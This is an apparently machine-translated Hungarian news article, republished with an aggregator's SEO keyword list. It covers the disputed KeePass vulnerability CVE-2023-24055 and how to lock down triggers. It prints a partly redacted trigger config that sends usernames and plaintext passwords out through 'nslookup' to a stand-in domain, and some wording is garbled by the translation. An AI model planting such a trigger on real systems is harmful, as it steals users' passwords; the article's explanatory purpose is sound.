Hírértékű néhány hét volt ez a jelszókezelők számára – azok a praktikus segédprogramok, amelyek segítenek más jelszót kitalálni minden webhelyhez, majd nyomon követni őket.
2022 végén a LastPass-on volt a sor, hogy a legtöbb hírről szóljon, amikor a cég végül elismerte, hogy a 2022 augusztusában elszenvedett jogsértés valóban az ügyfelek jelszavával kötött ki. a boltíveket ellopják a felhőszolgáltatásból, ahol biztonsági másolatot készítettek.
(Magukat a jelszavakat nem lopták el, mert a trezorok titkosítottak voltak, és a LastPassnak nem volt másolata senki „főkulcsáról” magának a biztonsági tárolófájlnak, de ez sokkal jobban sikerült, mint ahogy a legtöbb ember örült volna.)
Aztán a LifeLockon volt a sor, hogy a hírekkel foglalkozzon, amikor a cég figyelmeztetett, hogy valami kiütésnek tűnik. jelszó kitaláló támadások, valószínűleg egy teljesen más webhelyről lopott jelszavak alapján, valószínűleg régen, és talán nemrégiben vásárolt a sötét weben.
Magát a LifeLock-ot nem sértették meg, de néhány felhasználója igen, köszönhetően a jelszómegosztási viselkedésnek, amelyet olyan kockázatok okoztak, amelyekre talán nem is emlékeztek.
A versenytársak, az 1Password és a BitWarden is megjelentek a közelmúltban, a Google által nyilvánvalóan akaratlanul is sugárzott rosszindulatú hirdetésekről szóló jelentések alapján, amelyek meggyőzően csábították a felhasználókat a bejelentkezési oldalak replikáira, amelyek célja a fiókadatok adathalászata.
Most a KeePasson a sor a hírekben, ezúttal egy újabb kiberbiztonsági problémáról szól: egy állítólagos sebezhetőség, a zsargon kifejezés olyan szoftverhibákra használatos, amelyek kiberbiztonsági résekhez vezetnek, amelyeket a támadók esetleg gonosz célokra kihasználhatnak.
A jelszó letaglása egyszerűvé vált
Úgy hivatkozunk rá, mint a sebezhetőség itt, mert van egy hivatalos hibaazonosítója, amelyet az Egyesült Államok Nemzeti Szabványügyi és Technológiai Intézete adott ki.
A hibát elnevezték CVE-2023 24055-: Az XML konfigurációs fájlhoz írási hozzáféréssel rendelkező támadó [kérheti] a tiszta szövegű jelszavakat egy exportindító hozzáadásával.
Sajnos igaz az az állítás, hogy le lehet szerezni a tiszta szövegű jelszavakat.
Ha írási hozzáférésem van a személyes fájljaihoz, beleértve az ún %APPDATA%
könyvtárat, a konfigurációs részt alattomosan módosíthatom a már testreszabott KeePass-beállítások módosításához, vagy testreszabások hozzáadásához, ha tudatosan nem változtatott semmit…
…és meglepően könnyen el tudom lopni az ön egyszerű szöveges jelszavait, akár tömegesen, például úgy, hogy az egész adatbázist titkosítatlan CSV-fájlként kiírom, vagy ahogy használod őket, például úgy, hogy beállítok egy „programhookot”, amely minden alkalommal aktiválódik, amikor hozzáférsz egy jelszót az adatbázisból.
Vegye figyelembe, hogy nincs szükségem rá adminisztrátor jogosultságokat, mert nem kell a tényleges telepítési könyvtárral bajlódnom, ahol a KeePass alkalmazást tárolják, ami általában nem engedélyezett a normál felhasználók számára
És nincs szükségem hozzáférésre semmilyen zárolt globális konfigurációs beállításhoz.
Érdekes módon a KeePass mindent megtesz annak érdekében, hogy megakadályozza a jelszavak kiszippantását használatuk során, beleértve a manipuláció elleni védelmi technikákat, hogy megállítsák a különféle kulcsnaplózás elleni trükköket, még olyan felhasználóktól is, akik már rendelkeznek rendszergazdai jogokkal.
De a KeePass szoftver meglepően egyszerűvé teszi az egyszerű szöveges jelszóadatok rögzítését is, talán olyan módon, amelyet „túl könnyűnek” tarthat, még a nem rendszergazdák számára is.
Egy percnyi munka volt a KeePass GUI használatával létrehozni a ravasz Az esemény minden alkalommal lefut, amikor jelszót másol a vágólapra, és beállíthatja, hogy az esemény DNS-keresést hajtson végre, amely tartalmazza a kérdéses felhasználónevet és egyszerű szöveges jelszót is:
Ezután a saját helyi konfigurációs fájlunkból kimásolhattuk a nem túl nyilvánvaló XML-beállítást a saját helyi konfigurációs fájlunkból a rendszer egy másik felhasználójának konfigurációs fájljába, ami után ők is azt tapasztalnák, hogy a jelszavaik DNS-keresések révén kiszivárogtak az interneten.
Annak ellenére, hogy az XML konfigurációs adatok nagyrészt olvashatóak és informatívak, a KeePass kíváncsian véletlenszerű adatkarakterláncokat használ, amelyeket GUID-ként ismerünk (a globálisan egyedi azonosítók) a különféle jelölésére ravasz beállításokat, így még egy jól tájékozott felhasználónak is szüksége van egy kiterjedt referencialistára, hogy megértse, mely triggerek és hogyan vannak beállítva.
Így néz ki a DNS-szivárgást kiváltó eseményindítónk, bár néhány részletet kijavítottunk, hogy ne tudjon azonnali huncutságot okozni ennek a szövegnek a közvetlen másolásával és beillesztésével:
XXXXXXXXXXXXXXXXXXXXX Másolat Ellopni dolgokat DNS-keresésekkel XXXXXXXXXXXXXXXXXXXXX 0XXXXXXXXXXXXXXXXXXXXX nslookup XXXXXX.XXXXX.bla.teszt Igaz 1
Ha ez a trigger aktív, a KeePass jelszó elérése azt eredményezi, hogy az egyszerű szöveg kiszivárog egy észrevétlen DNS-keresés során egy általam választott tartományba, ami blah.test
ebben a példában.
Vegye figyelembe, hogy a valós támadók szinte biztosan összezavarják vagy elhomályosítják az ellopott szöveget, ami nemcsak megnehezítené a DNS-szivárgás észlelését, hanem a nem ASCII karaktereket, például ékezetes betűket vagy hangulatjeleket tartalmazó jelszavak kezelését is. amelyek egyébként nem használhatók DNS-nevekben:
De ez tényleg hiba?
A kényes kérdés azonban az, „Ez tényleg egy hiba, vagy csak egy olyan hatékony funkció, amellyel visszaélhet valaki, akinek már legalább annyi irányításra lenne szüksége a személyes fájljai felett, mint magának?”
Egyszerűen fogalmazva: sérülékenység-e, ha valaki, aki már rendelkezik az Ön fiókja felett, olyan fájlokkal keveredhet, amelyekhez a fiókja egyébként is hozzáférhet?
Még akkor is, ha abban reménykedhet, hogy a pssword manager sok extra szabotázs elleni védelmi réteget tartalmaz, hogy megnehezítse az ilyen jellegű hibákkal/szolgáltatásokkal való visszaélést, CVE-2023 24055- valóban egy CVE-listán szereplő sebezhetőség?
Ha igen, nem lennének parancsok, mint pl DEL
(fájl törlése) és FORMAT
„hibáknak” is kell lenniük?
És nem a PowerShell létezése, amely sokkal könnyebbé teszi a potenciálisan veszélyes viselkedés kiváltását (próbáld meg powerhsell get-clipboard
például), önmagában is sebezhetőség?
Ez a KeePass álláspontja, amelyet a következő szöveg is megerősít, amely hozzáadásra került a „hiba” részlet a NIST honlapján:
** VITÁS ** […] MEGJEGYZÉS: a szállító álláspontja az, hogy a jelszó-adatbázisnak nem célja, hogy védelmet nyújtson egy olyan támadóval szemben, aki ilyen szintű hozzáféréssel rendelkezik a helyi számítógéphez.
Mit kell tenni?
Ha Ön önálló KeePass-felhasználó, akkor a KeePass alkalmazás megnyitásával és a Eszközök > Kiváltók… ablak:
Vegye figyelembe, hogy az egészet elforgathatja ravasz rendszert ebből az ablakból egyszerűen a kijelölés törlésével [ ] Enable trigger system
választási lehetőség…
…de ez nem egy globális beállítás, ezért a helyi konfigurációs fájlon keresztül újra bekapcsolható, és így csak a hibáktól védi meg Önt, nem pedig a fiókjához hozzáférő támadóktól.
A globális „lockdown” fájl módosításával a beállítást a számítógépen mindenki számára kikapcsolhatja, de nincs lehetősége saját maguknak bekapcsolni. KeePass.config.enforced.XML
, amely abban a könyvtárban található, ahol maga az alkalmazásprogram telepítve van.
A triggerek mindenkinél ki lesznek kapcsolva, ha a globális XML kényszerítő fájl így néz ki:
hamis
(Ha kíváncsi arra, hogy egy támadó, akinek írási hozzáférése van az alkalmazáskönyvtárhoz a módosítás visszafordításához, szinte biztos, hogy elegendő rendszerszintű erővel rendelkezik ahhoz, hogy magát a KeePass végrehajtható fájlt módosítsa, vagy különálló billentyűzetnaplózót telepítsen és aktiváljon.)
Ha Ön hálózati rendszergazda, akinek feladata a KeePass zárolása a felhasználók számítógépén, hogy az továbbra is elég rugalmas legyen ahhoz, hogy segítsen nekik, de nem elég rugalmas ahhoz, hogy tévedésből segítsen a kiberbűnözőknek, javasoljuk, hogy olvassa el a KeePasst. Biztonsági kérdések oldal, a Triggerek oldal, és a Kényszerített konfiguráció cimre.
- SEO által támogatott tartalom és PR terjesztés. Erősödjön még ma.
- Platoblockchain. Web3 metaverzum intelligencia. Felerősített tudás. Hozzáférés itt.
- Forrás: https://nakedsecurity.sophos.com/2023/02/01/password-stealing-vulnerability-reported-in-keypass-bug-or-feature/
- 1
- 2022
- 70
- a
- Képes
- Rólunk
- felett
- Abszolút
- hozzáférés
- Hozzáférés
- Fiók
- aktív
- hozzáadott
- felvételt nyer
- hirdetések
- Után
- ellen
- Minden termék
- állítólagos
- már
- és a
- Másik
- app
- Alkalmazás
- Augusztus
- szerző
- auto
- vissza
- háttal ellátott
- background-image
- mentés
- alapján
- mert
- hogy
- határ
- Alsó
- megsértése
- Bogár
- bogarak
- elfog
- ami
- eset
- okozott
- okai
- Központ
- biztosan
- változik
- karakter
- ellenőrizze
- választás
- követelés
- közelebb
- felhő
- szín
- hogyan
- vállalat
- teljesen
- számítógép
- számítógépek
- Körülmények
- Configuration
- Fontolja
- ellenőrzés
- példányban
- tudott
- terjed
- teremt
- készítette
- cve
- kiberbűnözők
- Kiberbiztonság
- Veszélyes
- sötét
- Sötét web
- dátum
- adatbázis
- részletek
- DID
- különböző
- közvetlenül
- kijelző
- dns
- domain
- ne
- le-
- szinkronizált
- könnyebb
- könnyen
- bármelyik
- titkosított
- végrehajtás
- elég
- Egész
- Még
- esemény
- Minden
- mindenki
- példa
- Exploit
- export
- kiterjedt
- külön-
- Funkció
- kevés
- filé
- Fájlok
- Végül
- Találjon
- rugalmas
- következő
- Kényszer
- talált
- ból ből
- kap
- szerzés
- Globális
- Goes
- ügyes
- boldog
- tekintettel
- magasság
- segít
- itt
- Holes
- remény
- lebeg
- Hogyan
- azonban
- HTML
- HTTPS
- azonosító
- azonnali
- in
- tartalmaz
- beleértve
- Beleértve
- tájékoztató
- telepíteni
- példa
- Intézet
- Internet
- kérdés
- Kiadott
- IT
- maga
- zsargon
- Tart
- ismert
- nagymértékben
- LastPass
- tojók
- vezet
- szivárog
- Szivárgás
- szint
- Lista
- helyi
- nézett
- MEGJELENÉS
- lookup
- készült
- csinál
- KÉSZÍT
- menedzser
- Menedzserek
- Margó
- max-width
- esetleg
- hiba
- hibákat
- módosítása
- a legtöbb
- nevek
- nemzeti
- Szükség
- hálózat
- hír
- nst
- normális
- szerez
- hivatalos
- nyitás
- opció
- másképp
- saját
- paraméter
- Jelszó
- jelszavak
- Paul
- PC
- Emberek (People)
- talán
- személyes
- Adathalászat
- Egyszerű szöveg
- Plató
- Platón adatintelligencia
- PlatoData
- pozíció
- Hozzászólások
- potenciálisan
- hatalom
- erős
- hatáskörök
- PowerShell
- magán
- kiváltságok
- valószínűleg
- Program
- vásárolt
- célokra
- tesz
- kérdés
- véletlen
- kiütés
- Olvasás
- nemrég
- ajánl
- szabályos
- eszébe jut
- válasz
- Számolt
- Jelentések
- fordított
- kockázatok
- futás
- Rész
- biztonság
- értelemben
- szolgáltatás
- készlet
- beállítás
- beállítások
- rövid
- kellene
- egyszerűen
- So
- szoftver
- szilárd
- néhány
- Valaki
- Spot
- önálló
- szabványok
- Még mindig
- lopott
- megáll
- memorizált
- ilyen
- feltételezett
- SVG
- rendszer
- Vesz
- technikák
- Technológia
- A
- azok
- maguk
- ebből adódóan
- Keresztül
- idő
- nak nek
- is
- felső
- vágány
- átmenet
- átlátszó
- kiváltó
- igaz
- FORDULAT
- Fordult
- jellemzően
- egyedi
- URL
- us
- használ
- használó
- Felhasználók
- segédprogramok
- különféle
- Boltozat
- boltozat
- keresztül
- sebezhetőség
- W3
- módon
- háló
- weboldal
- Hetek
- Mit
- ami
- WHO
- lesz
- csodálkozó
- Munka
- lenne
- ír
- XML
- A te
- magad
- zephyrnet